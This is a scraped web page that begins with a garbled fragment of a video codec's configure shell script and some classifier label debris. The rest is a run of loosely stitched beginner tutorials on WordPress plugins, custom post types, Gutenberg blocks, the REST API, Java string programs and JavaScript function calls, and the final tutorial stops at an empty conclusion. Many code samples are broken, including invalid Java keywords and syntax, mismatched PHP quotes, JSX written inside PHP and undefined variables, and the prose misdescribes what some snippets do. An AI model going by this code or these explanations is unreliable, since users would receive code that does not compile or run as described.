content
stringlengths 228
999k
| pred_label
stringclasses 1
value | pred_score
float64 0.5
1
|
---|---|---|
Ace school
with brainly
• Get help from millions of students
• Learn from experts with step-by-step explanations
• Level-up by helping others
A community for students.
How do we show that if x is small enough for its cube to be assumed and higher powers to be neglected, √((1-x)/(1+x))=1-x+x^2⁄2?
Discrete Math
I got my questions answered at brainly.com in under 10 minutes. Go to brainly.com now for free help!
At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.
Join Brainly to access
this expert answer
SEE EXPERT ANSWER
To see the expert answer you'll need to create a free account at Brainly
\[\large \sqrt{\frac{1-x}{1+x}}=1+x+\frac{ x^2 }{ 2 }\] right? Not 100% sure what the question is, you may want to rewrite this "if x is small enough for itscube to be assumed and higher powers to be neglected"
You're correct, but please note the small changes to the question. I've edited
• phi
You use a taylor series expansion around x=0 http://en.wikipedia.org/wiki/Taylor_series
Not the answer you are looking for?
Search for more explanations.
Ask your own question
Other answers:
Thanks phi. You gave me a nice idea. I applied the Binomial Theorem to expand the expression as far as x^2 and I got the solution.
\[\sqrt{\frac{ 1-X }{ 1+X }}\times \sqrt{\frac{ 1+X }{ 1+X }}=\frac{ \sqrt{1-X ^{2}} }{ 1+X }\] \[\sqrt{\frac{ 1-X }{1+X }}\times \sqrt{\frac{ 1-X }{ 1-X }} =\frac{ 1-X }{\sqrt{1-X ^{2}} }\] \[=\left( 1-X \right)\times \left( 1-X ^{2} \right)^{\frac{ -1 }{ 2 }}\] \[=\left( 1-X \right)\left( 1+\left( \frac{ -1 }{2 } \right)\left(- X ^{2} \right) \right)\] \[=1+\frac{ X ^{2} }{2 }-X+Terms containing x ^{3} & higher powers=1-x+\frac{ x ^{2} }{ 2 }\]
\[=1-x+\left( \frac{ 1 }{2 } \right)\left( x ^{2} \right)\]
Not the answer you are looking for?
Search for more explanations.
Ask your own question
|
__label__pos
| 0.998134 |
Dev GuideAPI Reference
Dev GuideAPI ReferenceUser GuideGitHubNuGetDev CommunityDoc feedbackLog In
GitHubNuGetDev CommunityDoc feedback
OptimizelyJSON
This topic describes how to set up a custom User Profile Service or how to use the default for the Optimizely Android SDK.
Since statically typed languages lack native support for JSON, the Android SDK uses the OptimizelyJSON object to retrieve JSON in a flexible way. The Get All Feature Variables and Get Feature Variable JSON methods use OptimizelyJSON to return feature variables. For more information, see GetAllFeatureVariables and GetFeatureVariable.
Version
SDK v3.6 and higher
Methods
You can access JSON representations with the following methods:
MethodParametersDescription
toStringnoneReturns a string representation of the JSON object
toMapnoneReturns a map representation of the JSON object: (Map<String,Object>)
getValueString jsonKey, Class<T> clazzReturns a specified schema object (T) with the key/value pair of the JSON key you pass to this method.
If JSON key is null or empty, it populates your schema object with all JSON key/value pairs.
You can retrieve information for a nested member of the JSON data structure by using flattened JSON dot notation.
For example, if you want to access the key nestedField in {field1: {nestedField: "blah"}}, you can call getValue with the parameter "field1.nestedField2".
The OptimizelyJSON object is defined as follows:
public class OptimizelyJSON {
public String toString();
public Map<String,Object> toMap();
public <T> T getValue(@Nullable String jsonKey, Class<T> clazz) throws JsonParseException
}
Examples
You can easily use the OptimizelyJSON object, for example to:
• Get a JSON string by calling the toString method, or
• Retrieve a specified schema from the OptimizelyJSON object by calling the getValue method.
The following example shows how to use an OptimizelyJSON object to populate a schema object you declare.
//declare a schema object into which you want to unmarshal OptimizelyJson content:
public static class SSub {
public string field
}
public static class SObj {
public int field1
public double field2
public string field3
public SSub field4
}
//parse all json key/value pairs into your schema, sObj
SObj robj = optlyJSON.getValue(null, SObj.class);
//or, parse the specified key/value pair with an integer value
Integer rint = optlyJSON.getValue("field1", Integer.class)
//or, parse the specified key/value pair with a string value
var strValue string
SSub rsub = optlyJSON.getValue("field4.field", SSub.class)
|
__label__pos
| 0.969155 |
Exceptions étendues
Une classe d'exception écrite par l'utilisateur peut être définie en étendant la classe Exception interne. Les membres et les propriétés suivants montrent ce qui est accessible dans la classe enfant qui est dérivée de la classe Exception interne.
Exemple #1 La classe Exception interne
<?php
class Exception
{
protected
$message 'Exception inconnue'// message de l'exception
private $string; // __toString cache
protected $code 0; // code de l'exception défini par l'utilisateur
protected $file; // nom du fichier source de l'exception
protected $line; // ligne de la source de l'exception
private $trace; // backtrace
private $previous; // exception précédente (depuis PHP 5.3)
public function __construct($message null$code 0Exception $previous null);
final private function
__clone(); // Inhibe le clonage des exceptions.
final public function getMessage(); // message de l'exception
final public function getCode(); // code de l'exception
final public function getFile(); // nom du fichier source
final public function getLine(); // ligne du fichier source
final public function getTrace(); // un tableau de backtrace()
final public function getPrevious(); // exception précédente (depuis PHP 5.3)
final public function getTraceAsString(); // chaîne formatée de trace
// Remplacable
public function __toString(); // chaîne formatée pour l'affichage
}
?>
Si une classe étend la classe Exception interne et redéfinit le constructeur, il est vivement recommandé qu'elle appelle aussi parent::__construct() pour s'assurer que toutes les données disponibles ont été proprement assignées. La méthode __toString() peut être réécrite pour fournir un affichage personnalisé lorsque l'objet est présenté comme une chaîne.
Note:
Les exceptions ne peuvent pas être clônées. Si vous tentez de clôner une exception, une erreur fatale (E_ERROR) sera émise.
Exemple #2 Étendre la classe Exception (PHP 5.3.0+)
<?php
/**
* Définition d'une classe d'exception personnalisée
*/
class MyException extends Exception
{
// Redéfinissez l'exception ainsi le message n'est pas facultatif
public function __construct($message$code 0Exception $previous null) {
// traitement personnalisé que vous voulez réaliser ...
// assurez-vous que tout a été assigné proprement
parent::__construct($message$code$previous);
}
// chaîne personnalisée représentant l'objet
public function __toString() {
return
__CLASS__ ": [{$this->code}]: {$this->message}\n";
}
public function
customFunction() {
echo
"Une fonction personnalisée pour ce type d'exception\n";
}
}
/**
* Création d'une classe pour tester l'exception
*/
class TestException
{
public
$var;
const
THROW_NONE 0;
const
THROW_CUSTOM 1;
const
THROW_DEFAULT 2;
function
__construct($avalue self::THROW_NONE) {
switch (
$avalue) {
case
self::THROW_CUSTOM:
// lance une exception personnalisée
throw new MyException('1 est un paramètre invalide'5);
break;
case
self::THROW_DEFAULT:
// lance l'exception par défaut.
throw new Exception('2 n\'est pas autorisé en tant que paramètre'6);
break;
default:
// Aucune exception, l'objet sera créé.
$this->var $avalue;
break;
}
}
}
// Exemple 1
try {
$o = new TestException(TestException::THROW_CUSTOM);
} catch (
MyException $e) { // Devrait être attrapée
echo "Capture mon exception\n"$e;
$e->customFunction();
} catch (
Exception $e) { // Sauté
echo "Capture l'exception par défaut\n"$e;
}
// Continue l'exécution
var_dump($o); // Null
echo "\n\n";
//Exemple 2
try {
$o = new TestException(TestException::THROW_DEFAULT);
} catch (
MyException $e) { // Ne correspond pas à ce type
echo "Capture mon exception\n"$e;
$e->customFunction();
} catch (
Exception $e) { // Devrait être attrapée
echo "Capture l'exception par défaut\n"$e;
}
// Continue l'exécution
var_dump($o); // Null
echo "\n\n";
// Exemple 3
try {
$o = new TestException(TestException::THROW_CUSTOM);
} catch (
Exception $e) { // Devrait être attrapée
echo "Capture l'exception par défaut\n"$e;
}
// Continue l'exécution
var_dump($o); // Null
echo "\n\n";
// Exemple 4
try {
$o = new TestException();
} catch (
Exception $e) { // sauté, aucune exception
echo "Capture l'exception par défaut\n"$e;
}
// Continue l'exécution
var_dump($o); // TestException
echo "\n\n";
?>
Note:
Dans PHP, avant PHP 5.3.0 les exceptions ne pouvaient être nichées. Le code suivant montre un exemple d'extension de la classe d'Exception avant PHP 5.3.0.
<?php
/**
* Définition d'une classe d'exception personnalisée
*/
class MyException extends Exception
{
// Redéfinition du constructeur pour rendre le message obligatoire
public function __construct($message$code 0) {
// du code ici
// Appel du parent
parent::__construct($message$code);
}
// Représentation de l'objet sous forme de chaine personnalisée
public function __toString() {
return
__CLASS__ ": [{$this->code}]: {$this->message}\n";
}
public function
customFunction() {
echo
"Une méthode personnalisée pour cette exception\n";
}
}
?>
add a note add a note
User Contributed Notes 8 notes
up
10
iamhiddensomewhere at gmail dot com
6 years ago
As previously noted exception linking was recently added (and what a god-send it is, it certainly makes layer abstraction (and, by association, exception tracking) easier).
Since <5.3 was lacking this useful feature I took some initiative and creating a custom exception class that all of my exceptions inherit from:
<?php
class SystemException extends Exception
{
private
$previous;
public function
__construct($message, $code = 0, Exception $previous = null)
{
parent::__construct($message, $code);
if (!
is_null($previous))
{
$this -> previous = $previous;
}
}
public function
getPrevious()
{
return
$this -> previous;
}
}
?>
Hope you find it useful.
up
4
sapphirepaw.org
6 years ago
Support for exception linking was added in PHP 5.3.0. The getPrevious() method and the $previous argument to the constructor are not available on any built-in exceptions in older versions of PHP.
up
2
michaelrfairhurst at gmail dot com
3 years ago
Custom exception classes can allow you to write tests that prove your exceptions
are meaningful. Usually testing exceptions, you either assert the message equals
something in which case you can't change the message format without refactoring,
or not make any assertions at all in which case you can get misleading messages
later down the line. Especially if your $e->getMessage is something complicated
like a var_dump'ed context array.
The solution is to abstract the error information from the Exception class into
properties that can be tested everywhere except the one test for your formatting.
<?php
class TestableException extends Exception {
private
$property;
function
__construct($property) {
$this->property = $property;
parent::__construct($this->format($property));
}
function
format($property) {
return
"I have formatted: " . $property . "!!";
}
function
getProperty() {
return
$this->property;
}
}
function
testSomethingThrowsTestableException() {
try {
throw new
TestableException('Property');
} Catch (
TestableException $e) {
$this->assertEquals('Property', $e->getProperty());
}
}
function
testExceptionFormattingOnlyOnce() {
$e = new TestableException;
$this->assertEquals('I have formatted: properly for the only required test!!',
$e->format('properly for the only required test')
);
}
?>
up
-1
Dor
4 years ago
It's important to note that subclasses of the Exception class will be caught by the default Exception handler
<?php
/**
* NewException
* Extends the Exception class so that the $message parameter is now mendatory.
*
*/
class NewException extends Exception {
//$message is now not optional, just for the extension.
public function __construct($message, $code = 0, Exception $previous = null) {
parent::__construct($message, $code, $previous);
}
}
/**
* TestException
* Tests and throws Exceptions.
*/
class TestException {
const
NONE = 0;
const
NORMAL = 1;
const
CUSTOM = 2;
public function
__construct($type = self::NONE) {
switch (
$type) {
case
1:
throw new
Exception('Normal Exception');
break;
case
2:
throw new
NewException('Custom Exception');
break;
default:
return
0; //No exception is thrown.
}
}
}
try {
$t = new TestException(TestException::CUSTOM);
}
catch (
Exception $e) {
print_r($e); //Exception Caught
}
?>
Note that if an Exception is caught once, it won't be caught again (even for a more specific handler).
up
-8
hollodotme
2 years ago
Not mentioned in the class structure on top of this site are the following members:
<?php
/**
* @var string
*/
protected $string;
/**
* @var array
*/
protected $trace;
/**
* @var Exception
*/
protected $previous;
?>
... and these methods:
<?php
/**
* @return Exception|null
*/
final public function getPrevious();
?>
up
-4
florenxe
1 year ago
I just wanted to add that "extends" is same concept of "Inheritance" or "Prototyping in Javascript". So when you extend a class, you are simply inheriting the class's methods and properties. So you can create custom classes from existing classes like extending the array class.
up
-4
shaman_master at list dot ru
1 year ago
Use this example for not numeric codes:
<code>
<?php
class MyException extends Exception
{
/**
* Creates a new exception.
*
* @param string $message Error message
* @param mixed $code The exception code
* @param Exception $previous Previous exception
* @return void
*/
public function __construct($message = '', $code = 0, Exception $previous = null)
{
// Pass the message and integer code to the parent
parent::__construct((string)$message, (int)$code, $previous);
// @link http://bugs.php.net/39615 Save the unmodified code
$this->code = $code;
}
}
</
code>
up
-20
paragdiwan at gmail dot com
7 years ago
I have written similar simple custom exception class. Helpful for newbie.
<?php
/*
This is written for overriding the exceptions.
custom exception class
*/
error_reporting(E_ALL-E_NOTICE);
class
myCustomException extends Exception
{
public function
__construct($message, $code=0)
{
parent::__construct($message,$code);
}
public function
__toString()
{
return
"<b style='color:red'>".$this->message."</b>";
}
}
class
testException
{
public function
__construct($x)
{
$this->x=$x;
}
function
see()
{
if(
$this->x==9 )
{
throw new
myCustomException("i didnt like it");
}
}
}
$obj = new testException(9);
try{
$obj->see();
}
catch(
myCustomException $e)
{
echo
$e;
}
?>
To Top
|
__label__pos
| 0.872898 |
Try it, debug it, extend it
Try it, debug it, extend it
Python microbit basics: How to display images
Debug it with code
Find and fix the errors
The code below should be a game of spin the bottle, where an arrow spins around the screen before settling in one direction, but it’s got three deliberate errors in:
A syntax error is a problem with your code that stops it from running. They are the easiest type of error to find because you’ll get an error message telling you the line number near where python thinks the problem is when you try to run your code.
Clue: Line 3 is a list of all of the images the micro:bit is going to display for spin the bottle. A list can store more than one item of data in order. It uses square brackets to surround all the data, and each individual item should be separated by a comma.
A run-time error doesn’t stop your code from running but it causes your program to crash if it happens whilst your code is running. Run time errors often happen if you try to access data that doesn’t exist (e.g. you’re trying to read from a file that doesn’t exist, or you’re trying to read from a variable that hasn’t been set yet.
Clue: In this case, the code is trying to look up the 9th item in a list that only contains 8 items.
A logical error is the hardest type of error to find but often the easiest to fix once you’ve found it. It doesn’t stop your code from running and often it doesn’t even make your code crash. A logical error is when your code does exactly what you’ve told it to do, but you’ve told it to do the wrong thing.
Clue: Logical errors often happen when you try to multiply instead of divide, add instead of subtract, use True instead of False or something similar. In this case, the code should keep looping round forever, spinning the arrow then waiting for the arrow. What the code actually does is never loop round at all. Why?
If you’ve had a go at debugging the code and you’re stuck, watch the video below to give you some further help:
Leave a Reply
|
__label__pos
| 0.785836 |
3
The other day, I came across this question: https://softwareengineering.stackexchange.com/questions/337857/name-for-a-list-whose-structure-is-only-defined-by-the-structure-of-the-elements
I saw that the question was on hold for being unclear. However, I felt like I clearly understood the question being asked, so I submitted an edit suggestion to make the question clearer. I was hoping that the edit would be accepted, the question would be reopened, and then I could post an answer.
My suggestion was rejected, and I don't understand why.
One reviewer selected this reason for rejecting the suggestion:
This edit was intended to address the author of the post and makes no sense as an edit. It should have been written as a comment or an answer.
My edit was, in fact, an attempt at improving the question, not an attempt at communicating with the author of the question. I don't understand why the reviewer would have thought I was intending to address the author.
Another reviewer selected this reason:
This edit does not make the post even a little bit easier to read, easier to find, more accurate or more accessible. Changes are either completely superfluous or actively harm readability.
In my opinion, my edit makes the question a lot clearer. Am I wrong about this?
Why was my edit rejected? I'd still like to salvage the original author's question somehow; is there a way I can do that?
5
The close reason of unclear isn't really accurate. This question is primarily opinion based, since it's a name this thing question. The edit does not resolve the reasons for closing the question and make it into a question that would be reopened, so rejecting the edits is appropriate to prevent the question from being bumped back to the homepage.
• I'm not sure I agree. I think that the original question is a "what is the name of this well-known concept?" question, and since the concept does, in fact, have a name, it's not really opinion-based. But I accept the decision that was made. Thank you for your answer! – Tanner Swett Dec 15 '16 at 18:04
You must log in to answer this question.
Not the answer you're looking for? Browse other questions tagged .
|
__label__pos
| 0.96953 |
Method (computer Science)
Get Method Computer Science essential facts below. View Videos or join the Method Computer Science discussion. Add Method Computer Science to your PopFlock.com topic list for future reference or share this resource on social media.
Method Computer Science
A method in object-oriented programming (OOP) is a procedure associated with a message and an object. An object consists of data and behavior; these comprise an interface, which specifies how the object may be utilized by any of its various consumers.[1]
Data is represented as properties of the object, and behaviors are represented as methods. For example, a Window object could have methods such as open and close, while its state (whether it is open or closed at any given point in time) would be a property.
In class-based programming, methods are defined within a class, and objects are instances of a given class. One of the most important capabilities that a method provides is method overriding - the same name (e.g., area) can be used for multiple different kinds of classes. This allows the sending objects to invoke behaviors and to delegate the implementation of those behaviors to the receiving object. A method in Java programming sets the behavior of a class object. For example, an object can send an area message to another object and the appropriate formula is invoked whether the receiving object is a rectangle, circle, triangle, etc.
Methods also provide the interface that other classes use to access and modify the properties of an object; this is known as encapsulation. Encapsulation and overriding are the two primary distinguishing features between methods and procedure calls.[2]
Overriding and overloading
Method overriding and overloading are two of the most significant ways that a method differs from a conventional procedure or function call. Overriding refers to a subclass redefining the implementation of a method of its superclass. For example, findArea may be a method defined on a shape class,[3] triangle, etc. would each define the appropriate formula to calculate their area. The idea is to look at objects as "black boxes" so that changes to the internals of the object can be made with minimal impact on the other objects that use it. This is known as encapsulation and is meant to make code easier to maintain and re-use.
Method overloading, on the other hand, refers to differentiating the code used to handle a message based on the parameters of the method. If one views the receiving object as the first parameter in any method then overriding is just a special case of overloading where the selection is based only on the first argument. The following simple Java example illustrates the difference:
Accessor, mutator and manager methods
Accessor methods are used to read the data values of an object. Mutator methods are used to modify the data of an object. Manager methods are used to initialize and destroy objects of a class, e.g. constructors and destructors.
These methods provide an abstraction layer that facilitates encapsulation and modularity. For example, if a bank-account class provides a getBalance accessor method to retrieve the current balance (rather than directly accessing the balance data fields), then later revisions of the same code can implement a more complex mechanism for balance retrieval (e.g., a database fetch), without the dependent code needing to be changed. The concepts of encapsulation and modularity are not unique to object-oriented programming. Indeed, in many ways the object-oriented approach is simply the logical extension of previous paradigms such as abstract data types and structured programming.[4]
Constructors
A constructor is a method that is called at the beginning of an object's lifetime to create and initialize the object, a process called construction (or instantiation). Initialization may include an acquisition of resources. Constructors may have parameters but usually do not return values in most languages. See the following example in Java:
public class Main {
String _name;
int _roll;
Main(String name, int roll) { // constructor method
this._name = name;
this._roll = roll;
}
}
Destructors
A destructor is a method that is called automatically at the end of an object's lifetime, a process called destruction. Destruction in most languages does not allow destructor method arguments nor return values. Destruction can be implemented so as to perform cleanup chores and other tasks at object destruction.
Finalizers
In garbage-collected languages, such as Java, C#, and Python, destructors are known as finalizers. They have a similar purpose and function to destructors, but because of the differences between languages that utilize garbage-collection and languages with manual memory management, the sequence in which they are called is different.
Abstract methods
An abstract method is one with only a signature and no implementation body. It is often used to specify that a subclass must provide an implementation of the method. Abstract methods are used to specify interfaces in some programming languages.[5]
Example
The following Java code shows an abstract class that needs to be extended:
abstract class Shape {
abstract int area(int h, int w); // abstract method signature
}
The following subclass extends the main class:
public class Rectangle extends Shape {
@Override
int area(int h, int w) {
return h * w;
}
}
Reabstraction
If a subclass provides an implementation for an abstract method, another subclass can make it abstract again. This is called reabstraction.
In practice, this is rarely used.
Example
In C#, a virtual method can be overridden with an abstract method. (This also applies to Java, where all non-private methods are virtual.)
class IA
{
public virtual void M { }
}
abstract class IB : IA
{
public override abstract void M; // allowed
}
Interfaces' default methods can also be reabstracted, requiring subclasses to implement them. (This also applies to Java.)
interface IA
{
void M { }
}
interface IB : IA
{
abstract void IA.M;
}
class C : IB { } // error: class 'C' does not implement 'IA.M'.
Class methods
Class methods are methods that are called on a class rather than an instance. They are typically used as part of an object meta-model. I.e, for each class, defined an instance of the class object in the meta-model is created. Meta-model protocols allow classes to be created and deleted. In this sense, they provide the same functionality as constructors and destructors described above. But in some languages such as the Common Lisp Object System (CLOS) the meta-model allows the developer to dynamically alter the object model at run time: e.g., to create new classes, redefine the class hierarchy, modify properties, etc.
Special methods
Special methods are very language-specific and a language may support none, some, or all of the special methods defined here. A language's compiler may automatically generate default special methods or a programmer may be allowed to optionally define special methods. Most special methods cannot be directly called, but rather the compiler generates code to call them at appropriate times.
Static methods
Static methods are meant to be relevant to all the instances of a class rather than to any specific instance. They are similar to static variables in that sense. An example would be a static method to sum the values of all the variables of every instance of a class. For example, if there were a Product class it might have a static method to compute the average price of all products.
In Java, a commonly used static method is:
Math.max(double a, double b)
This static method has no owning object and does not run on an instance. It receives all information from its arguments.[3]
A static method can be invoked even if no instances of the class exist yet. Static methods are called "static" because they are resolved at compile time based on the class they are called on and not dynamically as in the case with instance methods, which are resolved polymorphically based on the runtime type of the object.
Copy-assignment operators
Copy-assignment operators define actions to be performed by the compiler when a class object is assigned to a class object of the same type.
Operator methods
Operator methods define or redefine operator symbols and define the operations to be performed with the symbol and the associated method parameters. C++ example:
#include <string>
class Data {
public:
bool operator<(const Data& data) const { return roll_ < data.roll_; }
bool operator==(const Data& data) const {
return name_ == data.name_ && roll_ == data.roll_;
}
private:
std::string name_;
int roll_;
};
Member functions in C++
Some procedural languages were extended with object-oriented capabilities to leverage the large skill sets and legacy code for those languages but still provide the benefits of object-oriented development. Perhaps the most well-known example is C++, an object-oriented extension of the C programming language. Due to the design requirements to add the object-oriented paradigm on to an existing procedural language, message passing in C++ has some unique capabilities and terminologies. For example, in C++ a method is known as a member function. C++ also has the concept of virtual functions which are member functions that can be overridden in derived classes and allow for dynamic dispatch.
Virtual functions
Virtual functions are the means by which a C++ class can achieve polymorphic behavior. Non-virtual member functions, or regular methods, are those that do not participate in polymorphism.
C++ Example:
#include <iostream>
#include <memory>
class Super {
public:
virtual ~Super = default;
virtual void IAm { std::cout << "I'm the super class!\n"; }
};
class Sub : public Super {
public:
void IAm override { std::cout << "I'm the subclass!\n"; }
};
int main {
std::unique_ptr<Super> inst1 = std::make_unique<Super>;
std::unique_ptr<Super> inst2 = std::make_unique<Sub>;
inst1->IAm; // Calls |Super::IAm|.
inst2->IAm; // Calls |Sub::IAm|.
}
See also
Notes
1. ^ Consumers of an object may consist of various kinds of elements, such as other programs, remote computer systems, or computer programmers who wish to utilize the object as part of their own programs.
2. ^ "What is an Object?". oracle.com. Oracle Corporation. Retrieved 2013.
3. ^ a b Martin, Robert C. (2009). Clean Code: A Handbook of Agile Software Craftsmanship. Prentice Hall. p. 296. ISBN 978-0-13-235088-4.
4. ^ Meyer, Bertrand (1988). Object-Oriented Software Construction. Cambridge: Prentice Hall International Series in Computer Science. pp. 52-54. ISBN 0-13-629049-3.
5. ^ "Abstract Methods and Classes". oracle.com. Oracle Java Documentation. Retrieved 2014.
References
This article uses material from the Wikipedia page available here. It is released under the Creative Commons Attribution-Share-Alike License 3.0.
Method_(computer_science)
Music Scenes
|
__label__pos
| 0.999735 |
Presentation vs Container best practices for client-side validation
(Mark Winterbottom) #1
Hey guys,
I’m new here and this is my first post on the forums. I’ve been learning React for a while and I have a question about the best practice for something.
I am building a React app and trying to follow the pattern of separating presentational and container components as described here.
I’m confused as to where client-side validation would sit in this pattern?
For example, if I have the following components:
Presentational
• InputField (rendering an )
• LoginForm (rendering a with for username and password)
Container
• LoginPage (renders the and handles making API request)
My question is, where would client-side form validation fit into this? Would it go into <LoginForm> or should it go in the <LoginForm>?
Appreciate any advice anyone can offer!
Cheers,
Mark
(Jason Sooter) #2
This article will give you some insight:
Validation will generally be in the Container.
Libraries like Formik, React-Final-Form, and Redux-Form also help with this. Even if just looking at them for the types of scenarios you need to handle.
(Mickey Puri) #3
Hi Mark
I would recommend putting client side validation in the LoginForm. The form is able to work out if it is valid or not and so this task does not need to be delegated to a parent component.
Mickey
(Joshua Ihejiamaizu) #4
Think of presentation components as strictly concerned with receiving and rendering props. This makes them easier to test and maintain as well as scale for different use cases.
I pretty much support @JasonSooter’s answer. You can also create a Higher Order Component that takes care of validation and prop passing, so your input components are simply always wrapped in the HoC and remain presentational themselves.
(Mark Winterbottom) #5
Hey all, really appreciate you taking the time to response, your suggestions are really helpful.
I have kept the validation out of the presentation components and put it in the container as suggested by @JasonSooter and @joshuaai. So far it seems a lot cleaner and easier to unit test.
Cheers,
Mark
|
__label__pos
| 0.546003 |
sshuttle
On-the-fly VPN over :ssh
web | docs | code | LGPL2.1+?
See also | :openvpn :ssh
Notes
Single connection
To create a single virtual connection, specify an IP address without an subnet mask or with a mask of /32. These are equivalent:
sshuttle -r user@host:port ip
sshuttle -r user@host:port ip/32
Reference: https://sshuttle.readthedocs.io/en/stable/manpage.html#cmdoption-sshuttle-arg-subnets
Backlinks: openvpn
CC0 / Public domain dedication To the extent possible under law, d3vid seaward has waived all copyright and related or neighboring rights to "sshuttle in Grasmere notebook, including code snippets" (why? how?)
|
__label__pos
| 0.931545 |
Interesting CNN article on Android's Open Operating System
Last Updated:
1. khsjsilver
khsjsilver Well-Known Member This Topic's Starter
Joined:
Aug 6, 2010
Messages:
63
Likes Received:
2
Advertisement
2. ekyle
ekyle Well-Known Member
Joined:
Jan 5, 2010
Messages:
1,773
Likes Received:
108
true :( as long as we have root, it's all good though :)
3. Frisco
Frisco =Luceat Lux Vestra= VIP Member
Joined:
Jan 19, 2010
Messages:
22,479
Likes Received:
9,225
4. bigbadwulff
bigbadwulff Well-Known Member
Joined:
Jun 15, 2010
Messages:
2,442
Likes Received:
200
CNN?
Surely Apple fanboys.
Haven't watched CNN in about 10 years.
5. ekyle
ekyle Well-Known Member
Joined:
Jan 5, 2010
Messages:
1,773
Likes Received:
108
I get good news on Twitter before it hits CNN lol
6. dmevis
dmevis Member
Joined:
Jul 16, 2010
Messages:
21
Likes Received:
0
Android is well on its way to being as "closed" as the iPhone. It is not being closed by Google, it is being closed by the Carriers and Manufacturers. Both the Carriers and Manufacturers are working hard to ensure that you can not change the phone from the way they dictate that you use it. They will continue to make it harder and harder to gain Root. Without Root, the Android is just as closed as the iPhone.
7. gr33nd3vil
gr33nd3vil Active Member
Joined:
Oct 24, 2010
Messages:
41
Likes Received:
4
I feel this statement is false. No one, I mean no one can make something unrootable, or tweakable. It's not realalistic. There is always and will always be someone or some group that finds a way to work around it.
the iPhone is semi crippled, depending how you look at it, as there is ways to jail break it, and such.
Just like the Droid can be rooted.
And the blackberry has it's Hyrbid OS's.
Most people choose rooted for better performance and battery life.
8. superdesi
superdesi Well-Known Member
Joined:
Dec 7, 2009
Messages:
364
Likes Received:
2
I kno I shud b using the forum search for this buuuuuut.....does rooting break your ToS with verizon?
9. jreed2560
jreed2560 Well-Known Member
Joined:
Dec 31, 2009
Messages:
3,922
Likes Received:
439
It voids your warranty if they check it, which they very rarely do
10. sund0wn
sund0wn Well-Known Member
Joined:
Aug 10, 2010
Messages:
775
Likes Received:
175
correct me if i'm wrong, but "open source" doesnt mean every android device has r/w system folders, unlocked bootloaders, etc. i think people confuse the term.
open source means the source code is readily available for anyone to make their own device. cell phones are a new frontier for open source OS. it isnt fair to compare phones to computers. the manufacturers are simply trying to protect themselves. sure, maybe they are making mistakes, but this whole thing is rather new, and they are simply trying to protect their bottom line.
android source code is readily available, and anyone can make applications, and we can get apps from anywhere. that is what open source is all about.
do i want devices with unlocked bootloaders and superuser access? of course. but, the fact that a manufacturer can make a device with android and lock it down, and set it up however they want, is exactly what open source is all about.
if you all want devices that arent locked down, and come pre-rooted, then you should also be prepared to pay $500+, and not expect the carriers to support them nearly as much. if you brick the device, too bad. i would actually support this, but it's not good for the average phone user. i may not be completely happy with the way things are, but i can't say i dont understant it.
11. sund0wn
sund0wn Well-Known Member
Joined:
Aug 10, 2010
Messages:
775
Likes Received:
175
this isnt true at all. on the iphone, the only place you can get apps is the app store (unless you jailbreak, in which case, you then only get app store and cydia). and, it is really hard to get an app into the app store. anyone can put an app in the market. also, look how many manufacturers have android phones. how many manufacturers have iOS? that is the difference between open and closed source. it has nothing to do with bootloaders or superuser access.
12. jreed2560
jreed2560 Well-Known Member
Joined:
Dec 31, 2009
Messages:
3,922
Likes Received:
439
I totally agree with you sundOwn. Google's job isn't making phones. Google provides the OS, which is as open as open can be. They release the source code for any and everybody to see and use. they allow the developers free reign to use it as they please to make applications. The market is completely open. Only when something is deemed totally inappropriate or harmful will it be taken down. Google holds their end of open source up. They can't be held responsible to the fact that once mfgs. get the OS they lock it down.
basically:
Google/Android = OPEN
MFG./Carriers = Nazi
lol
13. sund0wn
sund0wn Well-Known Member
Joined:
Aug 10, 2010
Messages:
775
Likes Received:
175
and to add to that, it's our job as the consumer to have a loud enough voice to let them know what we want. we're never going to see every phone come to market unlocked and rooted.
but, if we can find a way to make our voice heard, maybe we'll see some nice pieces of hardware, that we can do with what we please. i, for one, will not be buying another phone with eFuse.
just as enough people screamed loudly about IE being locked on to windows. now it's removable. we need to do the same with encrypted bootloaders and bloat. i'm not holding my breath, but we still need to band together and try. i know we are a small community, but we're growing every day, and that's all the more reason to band together.
14. nj02vette
nj02vette Well-Known Member
Joined:
Jul 9, 2010
Messages:
2,346
Likes Received:
2,034
CNN has apple shoved so far up it's rectum that it can taste the seeds.
Are they even a viable news source anymore?
15. Jim Dawson
Jim Dawson Well-Known Member
Joined:
Nov 27, 2009
Messages:
194
Likes Received:
9
No, and they haven't been for years.
16. cbaty08
cbaty08 Well-Known Member
Joined:
Sep 17, 2010
Messages:
94
Likes Received:
6
I can agree that every news outlet has an objective... but I do think that CNN is one of the more reputable broadcasts that are up to date with everything.
I am going to miss Rick Sanchez now though... oh well.
FWIW I hold quite a few of the reporters with mucho respect. Sanjay Gupta, Anderson Cooper, and a many many others are great reporters and good people.
17. aohus
aohus Well-Known Member
Joined:
Aug 27, 2010
Messages:
165
Likes Received:
26
the true source of the article is BusinessInsider.com they are a known apple enthusiast website. in essence, the bloggers are bought and paid for.
just look at their website and its all pro apple blog posts.
its the same thing as a foxnews article bashing the obama administration.
18. Sketchr
Sketchr VIP Member VIP Member
Joined:
May 28, 2010
Messages:
411
Likes Received:
141
which is similar to msnbc getting wood over the obama admin :D
19. eraursls1984
eraursls1984 Well-Known Member
Joined:
Sep 7, 2010
Messages:
800
Likes Received:
76
But thats ok because it's the same as their views. Fox news, although I don't like them or the others I'm going to name, uses exaggeration and lies much less than msnbc, cbs, nbc and cnn but a lot of people don't question them because it's what they want to hear.
Share This Page
Loading...
|
__label__pos
| 0.53114 |
Beep, beep, I'm a sheep
Audio I/O is a complex topic, which scares away many inspired musicians who are into programming (or programmers who are into music). Let’s try making it look less complex and see how audio works on each modern desktop platform.
Our show case today will be a simple beeper. Remeber that annoying thing inside your PC boxes producing the irritating buzzing sound? It’s long time gone, but I suggest to sumon its soul and make a library that plays beeps across all the platforms.
The end result is available here - https://github.com/zserge/beep.
Windows
We are lucky here - Windows already has a Beep(freqency, duration) function in the <utilapiset.h>, we can reuse that.
